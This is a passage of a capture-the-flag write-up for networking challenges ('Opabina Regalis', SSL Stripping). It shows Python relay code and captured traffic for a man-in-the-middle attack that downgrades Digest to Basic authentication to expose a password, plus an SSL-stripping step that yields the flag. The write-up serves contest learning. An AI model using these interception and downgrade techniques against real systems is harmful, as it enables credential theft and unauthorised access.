<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">parseRequest</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span>
<span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">parseReply</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span>
<span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">parseRequest</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span>
<span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">parseReply</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
</code></pre></div></div>
<p>Give us this output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ver: GET
uri: "/protected/joke"
headers {
key: "User-Agent"
value: "opabina-regalis.go"
}
===============================================================================
status: 401
headers {
key: "Server"
value: "opabina-regalis.go"
}
headers {
key: "WWW-Authenticate"
value: "Digest realm=\"In the realm of hackers\",qop=\"auth\",nonce=\"0b4ae2c311d6188c\",opaque=\"0b4ae2c311d6188c\""
}
headers {
key: "Content-Length"
value: "12"
}
body: "Unauthorized"
===============================================================================
ver: GET
uri: "/protected/joke"
headers {
key: "Authorization"
value: "Digest username=\"google.ctf\",realm=\"In the realm of hackers\",nonce=\"0b4ae2c311d6188c\",uri=\"/protected/joke\",qop=\"auth\",nc=e33ae5,cnonce=\"8cd0bc933beb5d5e\",response=\"08f46b47d4b6e5cb1925b8fabe113243\",opaque=\"0b4ae2c311d6188c\""
}
===============================================================================
status: 200
headers {
key: "Server"
value: "opabina-regalis.go"
}
body: "<h1>What do you call the rabbit next in line to the crown?</h1><p>The hare-apparent</p>"
</code></pre></div></div>
<p>We just changed the port from the previous solution (Downgrade Attack) and this
happened:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ver: GET
uri: "/protected/secret"
===============================================================================
status: 401
headers {
key: "Server"
value: "opabina-regalis.go"
}
headers {
key: "WWW-Authenticate"
value: "Digest realm=\"In the realm of hackers\",qop=\"auth\",nonce=\"8ca391b49fc7c325\",opaque=\"8ca391b49fc7c325\""
}
headers {
key: "Content-Length"
value: "12"
}
body: "Unauthorized"
===============================================================================
Nonce: 8ca391b49fc7c325
ver: GET
uri: "/protected/joke"
headers {
key: "Authorization"
value: "Basic Z29vZ2xlLmN0ZjoxNTQwODIxODYyLjIwNzk0MTQyNTYuMTE5NDk3OTY0MA=="
}
===============================================================================
Username: google.ctf
Password: 1540821862.2079414256.1194979640
===============================================================================
status: 404
headers {
key: "Server"
value: "opabina-regalis.go"
}
body: "404 - file not found. Have you tried /protected/joke or /protected/token?"
</code></pre></div></div>
<p>Ok… <code class="language-plaintext highlighter-rouge">sed -i 's/secret/token/g' answer.py; python answer.py</code> does the job.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ver: GET
uri: "/protected/token"
===============================================================================
status: 401
headers {
key: "Server"
value: "opabina-regalis.go"
}
headers {
key: "WWW-Authenticate"
value: "Digest realm=\"In the realm of hackers\",qop=\"auth\",nonce=\"58bb9b0afed222c8\",opaque=\"58bb9b0afed222c8\""
}
headers {
key: "Content-Length"
value: "12"
}
body: "Unauthorized"
===============================================================================
Nonce: 58bb9b0afed222c8
ver: GET
uri: "/protected/joke"
headers {
key: "Authorization"
value: "Basic Z29vZ2xlLmN0Zjo1NjY4OTE2MjUuMTA1OTYzNTA2LjE3NTU5NDYzODg="
}
===============================================================================
Username: google.ctf
Password: 566891625.105963506.1755946388
===============================================================================
status: 200
headers {
key: "Server"
value: "opabina-regalis.go"
}
body: "CTF{-Why-dont-eggs-tell-jokes...Theyd-crack-each-other-up-}"
</code></pre></div></div>
<p>Easiest 100 points of the CTF.</p>
<h2 id="ssl-stripping-network-75">SSL Stripping (Network 75)</h2>
<p>Following on from <strong>Opabina Regalis - Fetch Token</strong>, can you implement an SSL
stripping attack?</p>
<p>Listening on port 19121 on <code class="language-plaintext highlighter-rouge">ssl-added-and-removed-here.ctfcompetition.com</code></p>
<hr />
<p>We do as before, the server sends a html document to the client.</p>
<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><!DOCTYPE html></span>
<span class="nt"><html</span> <span class="na">lang=</span><span class="s">"en"</span><span class="nt">></span>
<span class="nt"><head></span>
<span class="nt"><meta</span> <span class="na">charset=</span><span class="s">"utf-8"</span><span class="nt">></span>
<span class="nt"><meta</span> <span class="na">http-equiv=</span><span class="s">"X-UA-Compatible"</span> <span class="na">content=</span><span class="s">"IE=edge"</span><span class="nt">></span>
<span class="nt"><meta</span> <span class="na">name=</span><span class="s">"viewport"</span> <span class="na">content=</span><span class="s">"width=device-width, initial-scale=1"</span><span class="nt">></span>
<span class="c"><!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags --></span>
<span class="nt"><meta</span> <span class="na">name=</span><span class="s">"description"</span> <span class="na">content=</span><span class="s">""</span><span class="nt">></span>
<span class="nt"><meta</span> <span class="na">name=</span><span class="s">"author"</span> <span class="na">content=</span><span class="s">""</span><span class="nt">></span>
<span class="nt"><link</span> <span class="na">rel=</span><span class="s">"icon"</span> <span class="na">href=</span><span class="s">"../../favicon.ico"</span><span class="nt">></span>
<span class="nt"><title></span>See your latest examples<span class="nt"></title></span>
<span class="c"><!-- Bootstrap core CSS --></span>
<span class="nt"><link</span> <span class="na">href=</span><span class="s">"../../dist/css/bootstrap.min.css"</span> <span class="na">rel=</span><span class="s">"stylesheet"</span><span class="nt">></span>
<span class="c"><!-- IE10 viewport hack for Surface/desktop Windows 8 bug --></span>
<span class="nt"><link</span> <span class="na">href=</span><span class="s">"../../assets/css/ie10-viewport-bug-workaround.css"</span> <span class="na">rel=</span><span class="s">"stylesheet"</span><span class="nt">></span>
<span class="c"><!-- Custom styles for this template --></span>
<span class="nt"><link</span> <span class="na">href=</span><span class="s">"jumbotron.css"</span> <span class="na">rel=</span><span class="s">"stylesheet"</span><span class="nt">></span>
<span class="nt"><script </span><span class="na">src=</span><span class="s">"../../assets/js/ie-emulation-modes-warning.js"</span><span class="nt">></script></span>
<span class="c"><!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --></span>
<span class="c"><!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]--></span>
<span class="nt"></head></span>
<span class="nt"><body></span>
<span class="nt"><nav</span> <span class="na">class=</span><span class="s">"navbar navbar-inverse navbar-fixed-top"</span><span class="nt">></span>
<span class="nt"><div</span> <span class="na">class=</span><span class="s">"container"</span><span class="nt">></span>
<span class="nt"><div</span> <span class="na">class=</span><span class="s">"navbar-header"</span><span class="nt">></span>
<span class="nt"><button</span> <span class="na">type=</span><span class="s">"button"</span> <span class="na">class=</span><span class="s">"navbar-toggle collapsed"</span> <span class="na">data-toggle=</span><span class="s">"collapse"</span> <span class="na">data-target=</span><span class="s">"#navbar"</span> <span class="na">aria-expanded=</span><span class="s">"false"</span> <span class="na">aria-controls=</span><span class="s">"navbar"</span><span class="nt">></span>
<span class="nt"><span</span> <span class="na">class=</span><span class="s">"sr-only"</span><span class="nt">></span>Toggle navigation<span class="nt"></span></span>
<span class="nt"><span</span> <span class="na">class=</span><span class="s">"icon-bar"</span><span class="nt">></span></span>
<span class="nt"><span</span> <span class="na">class=</span><span class="s">"icon-bar"</span><span class="nt">></span></span>
<span class="nt"><span</span> <span class="na">class=</span><span class="s">"icon-bar"</span><span class="nt">></span></span>
<span class="nt"></button></span>
<span class="nt"><a</span> <span class="na">class=</span><span class="s">"navbar-brand"</span> <span class="na">href=</span><span class="s">"#"</span><span class="nt">></span>HTTP is the threat actors delight. Learn how to protect your website now!<span class="nt"></a></span>
<span class="nt"></div></span>
<span class="nt"><div</span> <span class="na">id=</span><span class="s">"navbar"</span> <span class="na">class=</span><span class="s">"navbar-collapse collapse"</span><span class="nt">></span>
<span class="nt"><form</span> <span class="na">method=</span><span class="s">"POST"</span> <span class="na">action=</span><span class="s">"https://elided/user/sign_in"</span> <span class="na">class=</span><span class="s">"navbar-form navbar-right"</span><span class="nt">></span>
<span class="nt"><div</span> <span class="na">class=</span><span class="s">"form-group"</span><span class="nt">></span>
<span class="nt"><input</span> <span class="na">name=</span><span class="s">"email"</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">placeholder=</span><span class="s">"Email"</span> <span class="na">class=</span><span class="s">"form-control"</span><span class="nt">></span>
<span class="nt"></div></span>
<span class="nt"><div</span> <span class="na">class=</span><span class="s">"form-group"</span><span class="nt">></span>
<span class="nt"><input</span> <span class="na">type=</span><span class="s">"password"</span> <span class="na">name=</span><span class="s">"password"</span> <span class="na">placeholder=</span><span class="s">"Password"</span> <span class="na">class=</span><span class="s">"form-control"</span><span class="nt">></span>
<span class="nt"></div></span>
<span class="nt"><button</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">class=</span><span class="s">"btn btn-success"</span><span class="nt">></span>Sign in<span class="nt"></button></span>
<span class="nt"></form></span>
<span class="nt"></div></span><span class="c"><!--/.navbar-collapse --></span>
<span class="nt"></div></span>
<span class="nt"></nav></span>
<span class="nt"><div</span> <span class="na">class=</span><span class="s">"jumbotron"</span><span class="nt">></span>
<span class="nt"><div</span> <span class="na">class=</span><span class="s">"container"</span><span class="nt">></span>
<span class="nt"><h1></span>Are you broadcasting your secrets to everyone?<span class="nt"></h1></span>
<span class="nt"><p></span>Sending clear text data - regardless of it's purpose, is a bad idea, and will be used against you.<span class="nt"></p></span>
<span class="nt"><p><a</span> <span class="na">class=</span><span class="s">"btn btn-primary btn-lg"</span> <span class="na">href=</span><span class="s">"#"</span> <span class="na">role=</span><span class="s">"button"</span><span class="nt">></span>Learn more <span class="ni">&raquo;</span><span class="nt"></a></p></span>
<span class="nt"></div></span>
<span class="nt"></div></span>
<span class="nt"><div</span> <span class="na">class=</span><span class="s">"container"</span><span class="nt">></span>
<span class="c"><!-- Example row of columns --></span>
<span class="nt"><div</span> <span class="na">class=</span><span class="s">"row"</span><span class="nt">></span>
<span class="nt"><div</span> <span class="na">class=</span><span class="s">"col-md-4"</span><span class="nt">></span>
<span class="nt"><h2></span>Threat Actors Love Plaintext HTTP<span class="nt"></h2></span>
<span class="nt"><p></span>Are your users leaking private information over plaintext HTTP? It could be identifying information of ethnic information, or their corporate passwords, or other protected information? You should ensure your sites are using suitable encryption standards to keep them safe.<span class="nt"></p></span>
<span class="nt"><p><a</span> <span class="na">class=</span><span class="s">"btn btn-default"</span> <span class="na">href=</span><span class="s">"#"</span> <span class="na">role=</span><span class="s">"button"</span><span class="nt">></span>View details <span class="ni">&raquo;</span><span class="nt"></a></p></span>
<span class="nt"></div></span>
<span class="nt"><div</span> <span class="na">class=</span><span class="s">"col-md-4"</span><span class="nt">></span>
<span class="nt"><h2></span>Are your servers misconfigured?<span class="nt"></h2></span>
<span class="nt"><p></span>Do you still respond with plaintext HTTP even though you support HTTPS? Do you think that just having https:// links for sensitive information is a suitable practice? Learn more about how to correctly use HTTPS with your applications, and why "https everywhere" should be mandatory<span class="nt"></p></span>
<span class="nt"><p><a</span> <span class="na">class=</span><span class="s">"btn btn-default"</span> <span class="na">href=</span><span class="s">"#"</span> <span class="na">role=</span><span class="s">"button"</span><span class="nt">></span>View details <span class="ni">&raquo;</span><span class="nt"></a></p></span>
<span class="nt"></div></span>
<span class="nt"><div</span> <span class="na">class=</span><span class="s">"col-md-4"</span><span class="nt">></span>
<span class="nt"><h2></span>Advanced TLS<span class="nt"></h2></span>
<span class="nt"><p></span>Are you ready to learn more about advanced TLS protections available, such as HTTP Strict Transport Security, where you can prevent browsers from using insecure plaintext HTTP connections to your site?<span class="nt"></p></span>
<span class="nt"><p><a</span> <span class="na">class=</span><span class="s">"btn btn-default"</span> <span class="na">href=</span><span class="s">"#"</span> <span class="na">role=</span><span class="s">"button"</span><span class="nt">></span>View details <span class="ni">&raquo;</span><span class="nt"></a></p></span>
<span class="nt"></div></span>
<span class="nt"></div></span>
<span class="nt"><hr></span>
<span class="nt"><footer></span>
<span class="nt"><p></span><span class="ni">&copy;</span> 2015 This Was a Good Idea Many Years Ago, Now Get Your Sites ShipShape, Inc.<span class="nt"></p></span>
<span class="nt"></footer></span>
<span class="nt"></div></span> <span class="c"><!-- /container --></span>
<span class="c"><!-- Bootstrap core JavaScript
================================================== --></span>
<span class="c"><!-- Placed at the end of the document so the pages load faster --></span>
<span class="nt"><script </span><span class="na">src=</span><span class="s">"https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"</span><span class="nt">></script></span>
<span class="nt"><script></span><span class="nb">window</span><span class="p">.</span><span class="nx">jQuery</span> <span class="o">||</span> <span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="dl">'</span><span class="s1"><script src="../../assets/js/vendor/jquery.min.js"><</span><span class="se">\</span><span class="s1">/script></span><span class="dl">'</span><span class="p">)</span><span class="nt"></script></span>
<span class="nt"><script </span><span class="na">src=</span><span class="s">"../../dist/js/bootstrap.min.js"</span><span class="nt">></script></span>
<span class="c"><!-- IE10 viewport hack for Surface/desktop Windows 8 bug --></span>
<span class="nt"><script </span><span class="na">src=</span><span class="s">"../../assets/js/ie10-viewport-bug-workaround.js"</span><span class="nt">></script></span>
<span class="nt"></body></span>
<span class="nt"></html></span>
</code></pre></div></div>
<p>After a quick hand parsing we find this url: <code class="language-plaintext highlighter-rouge">https://elided/user/sign_in</code>, so
let’s just try this:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">tmp</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span><span class="p">)</span> <span class="c1"># from client
</span><span class="k">print</span><span class="p">(</span><span class="n">parseRequest</span><span class="p">(</span><span class="n">tmp</span><span class="p">))</span>
<span class="n">el</span><span class="p">()</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">makeRequest</span><span class="p">(</span><span class="n">Exchange</span><span class="p">.</span><span class="n">POST</span><span class="p">,</span> <span class="s">"/user/sign_in"</span><span class="p">))</span> <span class="c1"># to server
</span><span class="n">tmp</span> <span class="o">=</span> <span class="n">parseReply</span><span class="p">(</span><span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">8196</span> <span class="o">*</span> <span class="mi">16</span><span class="p">))</span> <span class="c1"># from server
</span><span class="n">printReply</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span>
</code></pre></div></div>
<p>and we get the key:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ver: GET
uri: "/"
headers {
key: "User-Agent"
value: "opabina-regalis.go"
}
===============================================================================
status: 302
headers {
key: "Server"
value: "opabina-regalis.go"
}
headers {
key: "Location"
value: "/content"
}
headers {
key: "Flag"
value: "CTF{Why=were=the=apple=and=the=orange=all=alone..Because=the=banana=spli7}"
}
body: "CTF{Why=were=the=apple=and=the=orange=all=alone..Because=the=banana=spli7}"
</code></pre></div></div>(Google Capture The Flag, Networking category)